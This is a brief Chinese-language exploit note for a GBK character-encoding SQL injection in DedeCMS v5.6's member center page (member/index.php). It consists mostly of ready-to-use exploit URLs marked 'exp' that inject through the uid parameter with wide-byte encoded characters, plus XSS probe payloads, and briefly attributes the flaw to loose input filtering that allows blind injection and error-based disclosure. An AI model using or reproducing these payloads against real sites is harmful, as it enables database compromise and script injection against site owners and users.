dedecms v5.6 GBK 注入漏洞利用(member/index.php)

exp:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,xss
exp:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7';

htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7wfxssprobe'")/>


htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7'">